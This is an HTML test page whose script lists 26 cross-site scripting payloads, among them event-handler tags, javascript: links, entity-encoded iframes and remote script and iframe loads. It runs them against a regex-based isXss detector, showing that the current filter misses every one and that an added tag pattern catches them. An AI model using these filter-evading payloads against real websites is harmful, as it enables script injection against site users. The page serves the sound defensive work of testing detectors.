<html>
<script>
var xsss = [
'<script >alert("XSS - 1");</script >',
'<script type="application/javascript">alert("XSS - 2");</script >',
'<script src="https://rawgit.com/cianmce/bc4ede289eba9eb34c5ef499ac3298eb/raw/1d80cdd168bdc4389ed011d41ecca4242ca633e8/xss-alert.js?msg=XSS - 3"></script >',
'<meta http-equiv="refresh" content="0;URL=https://httpbin.org/get?xss=XSS - 4" />',
'<input type="image" src onerror="alert(\"XSS - 5\")">',
'<object data="a.a" onerror="alert(\"XSS - 6\")" />',
'<object data="a.a" onerror="alert(\"XSS - 7\")">',
'<link data="a.a" onerror="alert(\"XSS - 8\")">',
'<input onfocus="console.log(\"XSS - 9\")" autofocus> // Uses console.log as "alert" will cause infinate loop',
'<video ><source onerror="alert(\"XSS - 10\")" >',
'<iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;alert(\"XSS - 11\")&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;">',
'<iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;alert(\"XSS - 12\")&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;" />',
'<iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;alert(\"XSS - 13\")&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;"></iframe >',
'<iframe style="display:none;" src="https://rawgit.com/cianmce/774471fbcffd4e31a950fbffa9b9a4d0/raw/7d68ac13ae3cca900ae3cec7cb21cf1f1c36d957/alert.html?msg=XSS - 14"></iframe >',
'<iframe style="display:none;" src="https://rawgit.com/cianmce/774471fbcffd4e31a950fbffa9b9a4d0/raw/7d68ac13ae3cca900ae3cec7cb21cf1f1c36d957/alert.html?msg=XSS - 15">',
'<iframe style="display:none;" src="//a.a" onload="alert(\"XSS - 16\");"></iframe >',
'<div style="opacity: 0; width:100%; height:100%; position:absolute; top:0px; left:0px; z-index:9999" onmousemove="alert(\"XSS - 17\")"></div >',
'<p style="opacity: 0; width:100%; height:100%; position:absolute; top:0px; left:0px; z-index:9999" onmousemove="alert(\"XSS - 18\")">',
'<frameset onload="alert(\"XSS - 19\")"><frame onload="Limited support"></frameset >',
'<a href="javascript:alert(\"XSS - 20\")" style="text-decoration: none; color:#000;" > ',
'<a onclick="alert(\"XSS - 21\")" style="text-decoration: none; color:#000;" > ',
'<a onmouseover="alert(\"XSS - 22\")" style="text-decoration: none; color:#000;" > ',
'<body onunload="alert(\"XSS - 23\")">',
'<body onresize="alert(\"XSS - 24\");">',
'<body onload="alert(\"XSS - 25\")">',
'<body style="opacity:0; pointer-events: none; filter: alpha(opacity=0);">',
]
const xssSimple = new RegExp('((%3C)|<)((%2F)|/)*[a-z0-9%]+((%3E)|>)', 'i')
const xssImgSrc = new RegExp('((%3C)|<)((%69)|i|(%49))((%6D)|m|(%4D))((%67)|g|(%47))[^\n]+((%3E)|>)', 'i')
const xssAnyTag = new RegExp('<(|\/|[^\/>][^>]+|\/[^>][^>]+)>')
// Current isXss function
function isXss (value) {
return xssSimple.test(value) || xssImgSrc.test(value)
}
// prints false for all
for(var i in xsss){
console.log( isXss(xsss[i]) + ": isXss(`" + xsss[i] + "`)");
}
// Current isXss function that also checks for any tags
function isXss (value) {
return xssSimple.test(value) || xssImgSrc.test(value) || xssAnyTag.test(value)
}
// prints true for all
for(var i in xsss){
console.log( isXss(xsss[i]) + ": isXss(`" + xsss[i] + "`)");
}
</script>
</html>